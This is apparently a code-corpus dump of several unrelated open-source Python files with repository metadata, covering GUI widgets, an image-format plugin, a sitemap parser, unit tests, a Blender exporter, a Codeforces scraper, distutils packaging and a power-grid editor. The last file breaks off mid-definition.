        self.TB_push.place(relx=0.47, rely=0.13, height=38, width=44)
        self.TB_push.configure(command=androidtool_support.push_file)
        self.TB_push.configure(takefocus="")
        self.TB_push.configure(text='''->''')

        self.TB_pull = ttk.Button(top)
        self.TB_pull.place(relx=0.47, rely=0.22, height=38, width=44)
        self.TB_pull.configure(command=androidtool_support.pull_file)
        self.TB_pull.configure(takefocus="")
        self.TB_pull.configure(text='''<-''')

        self.TB_refreshdir = ttk.Button(top)
        self.TB_refreshdir.place(relx=0.47, rely=0.3, height=38, width=44)
        self.TB_refreshdir.configure(command=androidtool_support.refresh_dir)
        self.TB_refreshdir.configure(takefocus="")
        self.TB_refreshdir.configure(text='''@''')

        self.TB_install = ttk.Button(top)
        self.TB_install.place(relx=0.47, rely=0.38, height=38, width=44)
        self.TB_install.configure(command=androidtool_support.install_apk)
        self.TB_install.configure(takefocus="")
        self.TB_install.configure(text='''X''')

        self.TL_localpath = ttk.Label(top)
        self.TL_localpath.place(relx=0.01, rely=0.09, height=19, relwidth=0.44)
        self.TL_localpath.configure(background=_bgcolor)
        self.TL_localpath.configure(foreground="#000000")
        self.TL_localpath.configure(relief=FLAT)
        self.TL_localpath.configure(text='''Local Path:''')

        self.TL_devicepath = ttk.Label(top)
        self.TL_devicepath.place(relx=0.54, rely=0.09, height=19, relwidth=0.44)
        self.TL_devicepath.configure(background=_bgcolor)
        self.TL_devicepath.configure(foreground="#000000")
        self.TL_devicepath.configure(relief=FLAT)
        self.TL_devicepath.configure(text='''Device Path:''')

        # Progress bar for file transfers.
        self.TProgressbar1 = ttk.Progressbar(top)
        self.TProgressbar1.place(relx=0.44, rely=0.05, relwidth=0.54,
            relheight=0.0, height=19)
        self.TProgressbar1.configure(length="0")

        self.TB_Browse = ttk.Button(top)
        self.TB_Browse.place(relx=0.31, rely=0.03, height=28, width=74)
        self.TB_Browse.configure(takefocus="")
        self.TB_Browse.configure(text='''Browse Dir''')
        self.TB_Browse.configure(command=androidtool_support.browse_dir)
        self.TB_Browse.configure(width=64)


# The following code is added to facilitate the Scrolled widgets you specified.
class AutoScroll(object):
    '''Configure the scrollbars for a widget.'''

    def __init__(self, master):
        # Rozen. Added the try-except clauses so that this class
        # could be used for scrolled entry widget for which vertical
        # scrolling is not supported. 5/7/14.
        try:
            vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
        except:
            pass
        hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)

        #self.configure(yscrollcommand=self._autoscroll(vsb),
        #    xscrollcommand=self._autoscroll(hsb))
        try:
            self.configure(yscrollcommand=self._autoscroll(vsb))
        except:
            pass
        self.configure(xscrollcommand=self._autoscroll(hsb))

        self.grid(column=0, row=0, sticky='nsew')
        try:
            vsb.grid(column=1, row=0, sticky='ns')
        except:
            pass
        hsb.grid(column=0, row=1, sticky='ew')

        master.grid_columnconfigure(0, weight=1)
        master.grid_rowconfigure(0, weight=1)

        # Copy geometry methods of master  (taken from ScrolledText.py)
        if py3:
            methods = Pack.__dict__.keys() | Grid.__dict__.keys() \
                  | Place.__dict__.keys()
        else:
            methods = Pack.__dict__.keys() + Grid.__dict__.keys() \
                  + Place.__dict__.keys()

        for meth in methods:
            if meth[0] != '_' and meth not in ('config', 'configure'):
                setattr(self, meth, getattr(master, meth))

    @staticmethod
    def _autoscroll(sbar):
        '''Hide and show scrollbar as needed.'''
        def wrapped(first, last):
            first, last = float(first), float(last)
            if first <= 0 and last >= 1:
                sbar.grid_remove()
            else:
                sbar.grid()
            sbar.set(first, last)
        return wrapped

    def __str__(self):
        return str(self.master)

def _create_container(func):
    '''Creates a ttk Frame with a given master, and use this new frame to
    place the scrollbars and the widget.'''
    def wrapped(cls, master, **kw):
        container = ttk.Frame(master)
        return func(cls, container, **kw)
    return wrapped

class ScrolledListBox(AutoScroll, Listbox):
    '''A standard Tkinter Text widget with scrollbars that will
    automatically show/hide as needed.'''
    @_create_container
    def __init__(self, master, **kw):
        Listbox.__init__(self, master, **kw)
        AutoScroll.__init__(self, master)

if __name__ == '__main__':
    vp_start_gui()
gpl-3.0
yd0str/infernal-twin
build/pillow/PIL/SunImagePlugin.py
26
1965
# # The Python Imaging Library. # $Id$ # # Sun image file handling # # History: # 1995-09-10 fl Created # 1996-05-28 fl Fixed 32-bit alignment # 1998-12-29 fl Import ImagePalette module # 2001-12-18 fl Fixed palette loading (from Jean-Claude Rimbault) # # Copyright (c) 1997-2001 by Secret Labs AB # Copyright (c) 1995-1996 by Fredrik Lundh # # See the README file for information on usage and redistribution. # __version__ = "0.3" from PIL import Image, ImageFile, ImagePalette, _binary i16 = _binary.i16be i32 = _binary.i32be def _accept(prefix): return len(prefix) >= 4 and i32(prefix) == 0x59a66a95 ## # Image plugin for Sun raster files. class SunImageFile(ImageFile.ImageFile): format = "SUN" format_description = "Sun Raster File" def _open(self): # HEAD s = self.fp.read(32) if i32(s) != 0x59a66a95: raise SyntaxError("not an SUN raster file") offset = 32 self.size = i32(s[4:8]), i32(s[8:12]) depth = i32(s[12:16]) if depth == 1: self.mode, rawmode = "1", "1;I" elif depth == 8: self.mode = rawmode = "L" elif depth == 24: self.mode, rawmode = "RGB", "BGR" else: raise SyntaxError("unsupported mode") compression = i32(s[20:24]) if i32(s[24:28]) != 0: length = i32(s[28:32]) offset = offset + length self.palette = ImagePalette.raw("RGB;L", self.fp.read(length)) if self.mode == "L": self.mode = rawmode = "P" stride = (((self.size[0] * depth + 7) // 8) + 3) & (~3) if compression == 1: self.tile = [("raw", (0, 0)+self.size, offset, (rawmode, stride))] elif compression == 2: self.tile = [("sun_rle", (0, 0)+self.size, offset, rawmode)] # # registry Image.register_open("SUN", SunImageFile, _accept) Image.register_extension("SUN", ".ras")
gpl-3.0
glaudsonml/kurgan-ai
tools/sqlmap/lib/parse/sitemap.py
2
1782
#!/usr/bin/env python """ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import re from lib.core.common import readInput from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapSyntaxException from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset abortedFlag = None def parseSitemap(url, retVal=None): global abortedFlag if retVal is not None: logger.debug("parsing sitemap '%s'" % url) try: if retVal is None: abortedFlag = False retVal = oset() try: content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" except httplib.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url raise SqlmapSyntaxException, errMsg for match in re.finditer(r"<loc>\s*([^<]+)", content or ""): if abortedFlag: break url = match.group(1).strip() if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " test = readInput(message, default="N") kb.followSitemapRecursion = test[0] in ("y", "Y") if kb.followSitemapRecursion: parseSitemap(url, retVal) else: retVal.add(url) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during sitemap parsing. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) return retVal
apache-2.0
incaser/server-tools
module_prototyper/tests/test_prototype_module_export.py
26
3107
# -*- encoding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    This module copyright (C) 2010 - 2014 Savoir-faire Linux
#    (<http://www.savoirfairelinux.com>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from openerp.tests import common
import zipfile
import StringIO


class test_prototype_module_export(common.TransactionCase):
    # Tests for the module_prototyper.module.export wizard: a prototype
    # record is created in setUp and exported through the wizard.

    def setUp(self):
        super(test_prototype_module_export, self).setUp()
        self.main_model = self.env['module_prototyper.module.export']
        self.prototype_model = self.env['module_prototyper']
        self.module_category_model = self.env[
            'ir.module.category'
        ]

        # A minimal prototype record with placeholder field values.
        self.prototype = self.prototype_model.create({
            'name': 't_name',
            'category_id': self.module_category_model.browse(1).id,
            'human_name': 't_human_name',
            'summary': 't_summary',
            'description': 't_description',
            'author': 't_author',
            'maintainer': 't_maintainer',
            'website': 't_website',
        })
        self.exporter = self.main_model.create({'name': 't_name'})

    def test_action_export_assert_for_wrong_active_model(self):
        """Test if the assertion raises."""
        # action_export asserts the context's active_model is the
        # prototyper model; any other model must fail.
        exporter = self.main_model.with_context(
            active_model='t_active_model'
        ).create({})
        self.assertRaises(
            AssertionError,
            exporter.action_export,
            [exporter.id],
        )

    def test_action_export_update_wizard(self):
        """Test if the wizard is updated during the process."""
        exporter = self.main_model.with_context(
            active_model=self.prototype_model._name,
            active_id=self.prototype.id
        ).create({})
        exporter.action_export(exporter.id)
        # After a successful export the wizard switches to the download
        # state and names the file after the prototype.
        self.assertEqual(exporter.state, 'get')
        self.assertEqual(exporter.name, '{}.zip'.format(self.prototype.name))

    def test_zip_files_returns_tuple(self):
        """Test the method return of the method that generate the zip file."""
        ret = self.main_model.zip_files(self.exporter, [self.prototype])
        # zip_files returns a (zip_file, stringIO) named tuple.
        self.assertIsInstance(ret, tuple)
        self.assertIsInstance(
            ret.zip_file, zipfile.ZipFile
        )
        self.assertIsInstance(
            ret.stringIO, StringIO.StringIO
        )
agpl-3.0
matgr1/three.js
utils/exporters/blender/addons/io_three/exporter/api/light.py
104
1461
from bpy import data, types
from .. import utilities, logger


def _lamp(func):
    """Decorator that resolves its first argument to a Blender lamp.

    Accepts either a bpy lamp object or a lamp name; looks names up in
    bpy.data.lamps before calling the wrapped function.

    :param func: function taking a lamp as its first argument
    """
    def inner(name, *args, **kwargs):
        """Resolve *name* to a lamp and delegate to the wrapped function.

        :param name: lamp object or lamp name
        :param *args:
        :param **kwargs:
        """
        if isinstance(name, types.Lamp):
            lamp = name
        else:
            lamp = data.lamps[name]

        return func(lamp, *args, **kwargs)

    return inner


@_lamp
def angle(lamp):
    """Spot cone angle (spot_size) of the lamp, in radians.

    :param lamp:
    :rtype: float

    """
    logger.debug("light.angle(%s)", lamp)
    return lamp.spot_size


@_lamp
def color(lamp):
    """Lamp colour packed into a single integer (0xRRGGBB).

    :param lamp:
    :rtype: int

    """
    logger.debug("light.color(%s)", lamp)
    colour = (lamp.color.r, lamp.color.g, lamp.color.b)
    return utilities.rgb2int(colour)


@_lamp
def distance(lamp):
    """Falloff distance of the lamp.

    :param lamp:
    :rtype: float

    """
    logger.debug("light.distance(%s)", lamp)
    return lamp.distance


@_lamp
def intensity(lamp):
    """Lamp energy rounded to two decimal places.

    :param lamp:
    :rtype: float

    """
    logger.debug("light.intensity(%s)", lamp)
    return round(lamp.energy, 2)


# mapping enum values to decay exponent
__FALLOFF_TO_EXP = {
    'CONSTANT': 0,
    'INVERSE_LINEAR': 1,
    'INVERSE_SQUARE': 2,
    'CUSTOM_CURVE': 0,
    'LINEAR_QUADRATIC_WEIGHTED': 2
}


@_lamp
def falloff(lamp):
    """Decay exponent derived from the lamp's falloff type.

    :param lamp:
    :rtype: float

    """
    logger.debug("light.falloff(%s)", lamp)
    return __FALLOFF_TO_EXP[lamp.falloff_type]
mit
Z2Y/CUITOJHelper-BackEnd
spider/CFSpider.py
3
4618
# Python 2 module: relies on the ``print`` statement and the
# ``except Exception, e`` syntax throughout.
# NOTE(review): ``BeautifulSoup``, ``Submit``, ``db`` and ``datetime`` are
# presumably provided by this star import -- verify against the package
# ``__init__``.
from __init__ import *
from BaseSpider import BaseSpider
import json, time


class CFSpider(BaseSpider):
    """Spider that mirrors a user's Codeforces activity via the CF web API."""

    def __init__(self):
        BaseSpider.__init__(self)
        # The Codeforces API is public, so no login handshake is needed.
        self.login_status = True

    def get_user_info(self):
        # Fetch the user.info payload for the tracked account; returns the
        # first result dict on 'OK', None otherwise.
        url = 'http://codeforces.com/api/user.info?handles='+self.account.nickname
        page = self.load_page(url)
        try:
            info = json.JSONDecoder().decode(page)
            status = info['status']
            if status == 'OK':
                result = info['result'][0]
                return result
            else:
                return None
        except Exception, e:
            raise Exception('GET USER INFO FAILED:' + e.message)

    def get_problem_count(self):
        # NOTE(review): maps rating/maxRating onto solved/submitted -- these
        # are rating figures, not real problem counts; confirm this is the
        # intended semantics for the caller.
        user_info = self.get_user_info()
        ret = {'solved': user_info['rating'], 'submitted': user_info['maxRating']}
        return ret

    def get_status(self, start, length):
        # Fetch ``length`` submissions starting at 1-based index ``start``.
        url = 'http://codeforces.com/api/user.status?handle={0}&from={1}&count={2}'.format(self.account.nickname, start, length)
        page = self.load_page(url)
        try:
            info = json.JSONDecoder().decode(page)
            status = info['status']
            if status == 'OK':
                return info['result']
            else:
                return []
        except Exception, e:
            raise Exception('GET STATUES ERROR:' + e.message)

    def is_gym(self, contest_id):
        # Gym contests use ids longer than 3 digits; those are skipped.
        if len(str(contest_id)) > 3:
            return True
        return False

    def get_status_list(self, start=1, length=30):
        # Normalise raw API submissions into the flat dicts consumed by the
        # persistence layer; gym submissions are filtered out.
        submits = self.get_status(start, length)
        slist = []
        try:
            for submit in submits:
                if self.is_gym(submit['contestId']):
                    continue
                submit_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(submit['creationTimeSeconds']))
                cur = {'contest_id': submit['contestId'],
                       'pro_index': submit['problem']['index'],
                       'run_id': submit['id'],
                       'submit_time': submit_time,
                       # API reports milliseconds and bytes; memory is stored in KB.
                       'run_time': submit['timeConsumedMillis'],
                       'memory': submit['memoryConsumedBytes'] / 1024,
                       'lang': submit['programmingLanguage'],
                       'result': submit['verdict']
                       }
                cur['pro_id'] = str(cur['contest_id']) + str(cur['pro_index'])
                cur['code'] = 'http://codeforces.com/contest/'+str(cur['contest_id'])+'/submission/'+str(cur['run_id'])
                slist.append(cur)
            return slist
        except Exception, e:
            raise Exception('GET STATUS LIST ERROR: ' + e.message)

    def get_solved_code(self, contest_id, run_id):
        # Scrape the submission page and return the source code text.
        url = 'http://codeforces.com/contest/'+str(contest_id)+'/submission/'+str(run_id)
        page = self.load_page(url)
        print url
        try:
            soup = BeautifulSoup(page)
            return soup.find('pre').text
        except Exception, e:
            raise Exception("CF crawl code error " + e.message)

    def update_submit(self, init=True, length=30):
        # Walk the submission list page by page and upsert Submit rows.
        # When init is False, stop at the first already-known submission.
        start = 1
        while True:
            slist = self.get_status_list(start)
            if not slist:
                return
            try:
                for status in slist:
                    if self.is_gym(status['contest_id']):
                        continue
                    nsub = Submit.query.filter(Submit.run_id == status['run_id'], Submit.oj_name == self.account.oj_name).first()
                    if nsub and not init:
                        return
                    if not nsub:
                        nsub = Submit(status['pro_id'], self.account)
                        nsub.update_info(status['run_id'],status['submit_time'],status['run_time'],status['memory'],status['lang'],status['code'],status['result'])
            except Exception, e:
                db.session.rollback()
                raise Exception('update Status Error:' + e.message)
            if init:
                db.session.commit()
                time.sleep(1)
            start += length
        # NOTE(review): the two statements below are unreachable -- the loop
        # above only exits via ``return`` -- so last_update_time is never set
        # here; confirm whether this was intended.
        self.account.last_update_time = datetime.datetime.now()
        db.session.commit()

    def update_account(self, init):
        # Refresh profile counters, then crawl submissions and log out.
        if not self.account:
            raise Exception("CF account not set")
        count = self.get_problem_count()
        self.account.set_problem_count(count['solved'], count['submitted'])
        self.account.last_update_time = datetime.datetime.now()
        self.account.save()
        self.update_submit(init)
        self.logout()
mit
danieldresser/cortex
test/IECoreRI/DetailTest.py
7
2410
########################################################################## # # Copyright (c) 2009-2013, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # * Neither the name of Image Engine Design nor the names of any # other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
# ########################################################################## import unittest import IECore import IECoreRI import os.path import os class DetailTest( IECoreRI.TestCase ) : def test( self ) : r = IECoreRI.Renderer( "test/IECoreRI/output/testDetail.rib" ) r.worldBegin() r.setAttribute( "ri:detail", IECore.Box3f( IECore.V3f( 1, 2, 3 ), IECore.V3f( 4, 5, 6 ) ) ) r.setAttribute( "ri:detailRange", IECore.FloatVectorData( [ 0, 1, 2, 3 ] ) ) r.worldEnd() l = "".join( file( "test/IECoreRI/output/testDetail.rib" ).readlines() ) self.assert_( "Detail [ 1 4 2 5 3 6 ]" in l ) self.assert_( "DetailRange 0 1 2 3" in l ) if __name__ == "__main__": unittest.main()
bsd-3-clause
ryokochang/Slab-GCS
packages/IronPython.StdLib.2.7.5-beta1/content/Lib/distutils/command/bdist.py
228
5596
"""distutils.command.bdist Implements the Distutils 'bdist' command (create a built [binary] distribution).""" __revision__ = "$Id$" import os from distutils.util import get_platform from distutils.core import Command from distutils.errors import DistutilsPlatformError, DistutilsOptionError def show_formats(): """Print list of available formats (arguments to "--format" option). """ from distutils.fancy_getopt import FancyGetopt formats = [] for format in bdist.format_commands: formats.append(("formats=" + format, None, bdist.format_command[format][1])) pretty_printer = FancyGetopt(formats) pretty_printer.print_help("List of available distribution formats:") class bdist(Command): description = "create a built (binary) distribution" user_options = [('bdist-base=', 'b', "temporary directory for creating built distributions"), ('plat-name=', 'p', "platform name to embed in generated filenames " "(default: %s)" % get_platform()), ('formats=', None, "formats for distribution (comma-separated list)"), ('dist-dir=', 'd', "directory to put final built distributions in " "[default: dist]"), ('skip-build', None, "skip rebuilding everything (for testing/debugging)"), ('owner=', 'u', "Owner name used when creating a tar file" " [default: current user]"), ('group=', 'g', "Group name used when creating a tar file" " [default: current group]"), ] boolean_options = ['skip-build'] help_options = [ ('help-formats', None, "lists available distribution formats", show_formats), ] # The following commands do not take a format option from bdist no_format_option = ('bdist_rpm',) # This won't do in reality: will need to distinguish RPM-ish Linux, # Debian-ish Linux, Solaris, FreeBSD, ..., Windows, Mac OS. default_format = {'posix': 'gztar', 'nt': 'zip', 'os2': 'zip'} # Establish the preferred order (for the --help-formats option). format_commands = ['rpm', 'gztar', 'bztar', 'ztar', 'tar', 'wininst', 'zip', 'msi'] # And the real information. 
format_command = {'rpm': ('bdist_rpm', "RPM distribution"), 'gztar': ('bdist_dumb', "gzip'ed tar file"), 'bztar': ('bdist_dumb', "bzip2'ed tar file"), 'ztar': ('bdist_dumb', "compressed tar file"), 'tar': ('bdist_dumb', "tar file"), 'wininst': ('bdist_wininst', "Windows executable installer"), 'zip': ('bdist_dumb', "ZIP file"), 'msi': ('bdist_msi', "Microsoft Installer") } def initialize_options(self): self.bdist_base = None self.plat_name = None self.formats = None self.dist_dir = None self.skip_build = 0 self.group = None self.owner = None def finalize_options(self): # have to finalize 'plat_name' before 'bdist_base' if self.plat_name is None: if self.skip_build: self.plat_name = get_platform() else: self.plat_name = self.get_finalized_command('build').plat_name # 'bdist_base' -- parent of per-built-distribution-format # temporary directories (eg. we'll probably have # "build/bdist.<plat>/dumb", "build/bdist.<plat>/rpm", etc.) if self.bdist_base is None: build_base = self.get_finalized_command('build').build_base self.bdist_base = os.path.join(build_base, 'bdist.' + self.plat_name) self.ensure_string_list('formats') if self.formats is None: try: self.formats = [self.default_format[os.name]] except KeyError: raise DistutilsPlatformError, \ "don't know how to create built distributions " + \ "on platform %s" % os.name if self.dist_dir is None: self.dist_dir = "dist" def run(self): # Figure out which sub-commands we need to run. commands = [] for format in self.formats: try: commands.append(self.format_command[format][0]) except KeyError: raise DistutilsOptionError, "invalid format '%s'" % format # Reinitialize and run each command. 
for i in range(len(self.formats)): cmd_name = commands[i] sub_cmd = self.reinitialize_command(cmd_name) if cmd_name not in self.no_format_option: sub_cmd.format = self.formats[i] # passing the owner and group names for tar archiving if cmd_name == 'bdist_dumb': sub_cmd.owner = self.owner sub_cmd.group = self.group # If we're going to need to run this command again, tell it to # keep its temporary files around so subsequent runs go faster. if cmd_name in commands[i+1:]: sub_cmd.keep_temp = 1 self.run_command(cmd_name)
gpl-3.0
SanPen/GridCal
src/GridCal/Gui/GridEditorWidget/upfc_graphics.py
1
19354
# This file is part of GridCal. # # GridCal is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # GridCal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GridCal. If not, see <http://www.gnu.org/licenses/>. import numpy as np from GridCal.Gui.GridEditorWidget.generic_graphics import * from GridCal.Gui.GridEditorWidget.bus_graphics import TerminalItem from GridCal.Gui.GuiFunctions import BranchObjectModel from GridCal.Engine.Devices.upfc import UPFC from GridCal.Engine.Devices.branch import Branch, BranchType from GridCal.Engine.Simulations.Topology.topology_driver import reduce_grid_brute from GridCal.Gui.GridEditorWidget.messages import * class UpfcEditor(QDialog): def __init__(self, branch: UPFC, Sbase=100): """ Line Editor constructor :param branch: Branch object to update :param Sbase: Base power in MVA """ super(UpfcEditor, self).__init__() # keep pointer to the line object self.branch = branch self.Sbase = Sbase self.setObjectName("self") self.setContextMenuPolicy(Qt.NoContextMenu) self.layout = QVBoxLayout(self) # ------------------------------------------------------------------------------------------ # Set the object values # ------------------------------------------------------------------------------------------ Vf = self.branch.bus_from.Vnom Vt = self.branch.bus_to.Vnom Zbase = self.Sbase / (Vf * Vf) Ybase = 1 / Zbase R = self.branch.R * Zbase X = self.branch.X * Zbase G = self.branch.G * Ybase B = self.branch.B * Ybase I = self.branch.rate / Vf # current in kA # 
------------------------------------------------------------------------------------------ # line length self.l_spinner = QDoubleSpinBox() self.l_spinner.setMinimum(0) self.l_spinner.setMaximum(9999999) self.l_spinner.setDecimals(6) self.l_spinner.setValue(1) # Max current self.i_spinner = QDoubleSpinBox() self.i_spinner.setMinimum(0) self.i_spinner.setMaximum(9999999) self.i_spinner.setDecimals(2) self.i_spinner.setValue(I) # R self.r_spinner = QDoubleSpinBox() self.r_spinner.setMinimum(0) self.r_spinner.setMaximum(9999999) self.r_spinner.setDecimals(6) self.r_spinner.setValue(R) # X self.x_spinner = QDoubleSpinBox() self.x_spinner.setMinimum(0) self.x_spinner.setMaximum(9999999) self.x_spinner.setDecimals(6) self.x_spinner.setValue(X) # G self.g_spinner = QDoubleSpinBox() self.g_spinner.setMinimum(0) self.g_spinner.setMaximum(9999999) self.g_spinner.setDecimals(6) self.g_spinner.setValue(G) # B self.b_spinner = QDoubleSpinBox() self.b_spinner.setMinimum(0) self.b_spinner.setMaximum(9999999) self.b_spinner.setDecimals(6) self.b_spinner.setValue(B) # accept button self.accept_btn = QPushButton() self.accept_btn.setText('Accept') self.accept_btn.clicked.connect(self.accept_click) # labels # add all to the GUI self.layout.addWidget(QLabel("L: Line length [Km]")) self.layout.addWidget(self.l_spinner) self.layout.addWidget(QLabel("Imax: Max. 
current [KA] @" + str(int(Vf)) + " [KV]")) self.layout.addWidget(self.i_spinner) self.layout.addWidget(QLabel("R: Resistance [Ohm/Km]")) self.layout.addWidget(self.r_spinner) self.layout.addWidget(QLabel("X: Inductance [Ohm/Km]")) self.layout.addWidget(self.x_spinner) self.layout.addWidget(QLabel("G: Conductance [S/Km]")) self.layout.addWidget(self.g_spinner) self.layout.addWidget(QLabel("B: Susceptance [S/Km]")) self.layout.addWidget(self.b_spinner) self.layout.addWidget(self.accept_btn) self.setLayout(self.layout) self.setWindowTitle('Line editor') def accept_click(self): """ Set the values :return: """ l = self.l_spinner.value() I = self.i_spinner.value() R = self.r_spinner.value() * l X = self.x_spinner.value() * l G = self.g_spinner.value() * l B = self.b_spinner.value() * l Vf = self.branch.bus_from.Vnom Vt = self.branch.bus_to.Vnom Sn = np.round(I * Vf, 2) # nominal power in MVA = kA * kV Zbase = self.Sbase / (Vf * Vf) Ybase = 1.0 / Zbase self.branch.R = np.round(R / Zbase, 6) self.branch.X = np.round(X / Zbase, 6) self.branch.G = np.round(G / Ybase, 6) self.branch.B = np.round(B / Ybase, 6) self.branch.rate = Sn self.accept() class UpfcGraphicItem(QGraphicsLineItem): def __init__(self, fromPort: TerminalItem, toPort: TerminalItem, diagramScene, width=5, branch: UPFC = None): """ :param fromPort: :param toPort: :param diagramScene: :param width: :param branch: """ QGraphicsLineItem.__init__(self, None) self.api_object = branch if self.api_object is not None: if self.api_object.active: self.style = ACTIVE['style'] self.color = ACTIVE['color'] else: self.style = DEACTIVATED['style'] self.color = DEACTIVATED['color'] else: self.style = OTHER['style'] self.color = OTHER['color'] self.width = width self.pen_width = width self.setPen(QPen(self.color, self.width, self.style)) self.setFlag(self.ItemIsSelectable, True) self.setCursor(QCursor(Qt.PointingHandCursor)) self.pos1 = None self.pos2 = None self.fromPort = None self.toPort = None self.diagramScene = 
diagramScene if fromPort: self.setFromPort(fromPort) if toPort: self.setToPort(toPort) # add transformer circles h = 48 w = h self.symbol = QGraphicsRectItem(QRectF(0, 0, w, h), parent=self) if self.api_object is not None: self.update_symbol() # add the line and it possible children to the scene self.diagramScene.addItem(self) if fromPort and toPort: self.redraw() def set_colour(self, color: QColor, w, style: Qt.PenStyle): """ Set color and style :param color: QColor instance :param w: width :param style: PenStyle instance :return: """ self.setPen(QPen(color, w, style)) self.symbol.setPen(QPen(color, w, style)) self.symbol.setBrush(color) def remove_symbol(self): """ Remove all symbols """ for elm in [self.symbol]: if elm is not None: try: self.diagramScene.removeItem(elm) except: pass def update_symbol(self): """ Make the branch symbol """ # remove the symbol of the branch self.remove_symbol() self.make_vsc_symbol() def make_vsc_symbol(self): """ Make the VSC symbol """ h = 48 w = h self.symbol = QGraphicsRectItem(QRectF(0, 0, w, h), parent=self) self.symbol.setPen(QPen(self.color, self.width, self.style)) graphic = QGraphicsRectItem(QRectF(0, 0, w, h), parent=self.symbol) graphic.setBrush(QBrush(QPixmap(":/Icons/icons/upfc.svg"))) graphic.setPen(QPen(Qt.transparent, self.width, self.style)) if self.api_object.active: self.symbol.setBrush(self.color) else: self.symbol.setBrush(QBrush(Qt.white)) def setToolTipText(self, toolTip: str): """ Set branch tool tip text Args: toolTip: text """ self.setToolTip(toolTip) if self.symbol is not None: self.symbol.setToolTip(toolTip) def contextMenuEvent(self, event): """ Show context menu @param event: @return: """ if self.api_object is not None: menu = QMenu() pe = menu.addAction('Enable/Disable') pe_icon = QIcon() if self.api_object.active: pe_icon.addPixmap(QPixmap(":/Icons/icons/uncheck_all.svg")) else: pe_icon.addPixmap(QPixmap(":/Icons/icons/check_all.svg")) pe.setIcon(pe_icon) 
pe.triggered.connect(self.enable_disable_toggle) menu.addSeparator() ra2 = menu.addAction('Delete') del_icon = QIcon() del_icon.addPixmap(QPixmap(":/Icons/icons/delete3.svg")) ra2.setIcon(del_icon) ra2.triggered.connect(self.remove) menu.addSeparator() ra3 = menu.addAction('Edit') edit_icon = QIcon() edit_icon.addPixmap(QPixmap(":/Icons/icons/edit.svg")) ra3.setIcon(edit_icon) ra3.triggered.connect(self.edit) menu.addSeparator() ra6 = menu.addAction('Plot profiles') plot_icon = QIcon() plot_icon.addPixmap(QPixmap(":/Icons/icons/plot.svg")) ra6.setIcon(plot_icon) ra6.triggered.connect(self.plot_profiles) ra4 = menu.addAction('Assign rate to profile') ra4_icon = QIcon() ra4_icon.addPixmap(QPixmap(":/Icons/icons/assign_to_profile.svg")) ra4.setIcon(ra4_icon) ra4.triggered.connect(self.assign_rate_to_profile) ra5 = menu.addAction('Assign active state to profile') ra5_icon = QIcon() ra5_icon.addPixmap(QPixmap(":/Icons/icons/assign_to_profile.svg")) ra5.setIcon(ra5_icon) ra5.triggered.connect(self.assign_status_to_profile) menu.addSeparator() re = menu.addAction('Reduce') re_icon = QIcon() re_icon.addPixmap(QPixmap(":/Icons/icons/grid_reduction.svg")) re.setIcon(re_icon) re.triggered.connect(self.reduce) menu.exec_(event.screenPos()) else: pass def mousePressEvent(self, QGraphicsSceneMouseEvent): """ mouse press: display the editor :param QGraphicsSceneMouseEvent: :return: """ mdl = BranchObjectModel([self.api_object], self.api_object.editable_headers, parent=self.diagramScene.parent().object_editor_table, editable=True, transposed=True, non_editable_attributes=self.api_object.non_editable_attributes) self.diagramScene.parent().object_editor_table.setModel(mdl) def mouseDoubleClickEvent(self, event): """ On double click, edit :param event: :return: """ if self.api_object.branch_type in [BranchType.Transformer, BranchType.Line]: # trigger the editor self.edit() elif self.api_object.branch_type is BranchType.Switch: # change state self.enable_disable_toggle() def 
